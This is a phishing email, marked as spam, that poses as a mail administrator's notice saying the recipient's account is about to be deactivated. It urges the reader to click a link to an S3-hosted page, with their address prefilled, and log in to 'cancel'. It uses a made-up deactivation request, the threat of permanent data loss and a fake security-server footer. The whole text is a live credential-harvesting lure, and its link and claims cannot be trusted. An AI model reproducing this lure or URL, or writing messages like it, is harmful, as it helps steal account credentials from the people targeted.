Subject: ***SPAM*** Notice: Account Deactivation For ([email-masked])
From: "Email Administrator puyuantrading.com" <[email-masked]>
To: <[email-masked]>
Date: Tue, 20 Feb 2024 23:15:00 +0330

Server Message	

Our record indicates that you recently made a request to deactivate email
And this request will be processed shortly.

If this request was made accidentally and you have no knowledge of it, you
are advised to cancel the request now by clicking below, login with your
account to cancel 

	

 
<https://montsela.s3.us-east-2.amazonaws.com/control_kpi.html?login=info@p
uyuantrading.com&pcnt=3&no_redrct=no_redrct&request_type=cancel_request>
Cancel De-activation

However, if you do not cancel this request, the your account will be
DE-activated shortly 
and all your email data will be lost permanently. 

Regards.
Email Administrator

	

  _____  

This message is auto-generated from E-mail security server, and replies
sent to this email can not be delivered.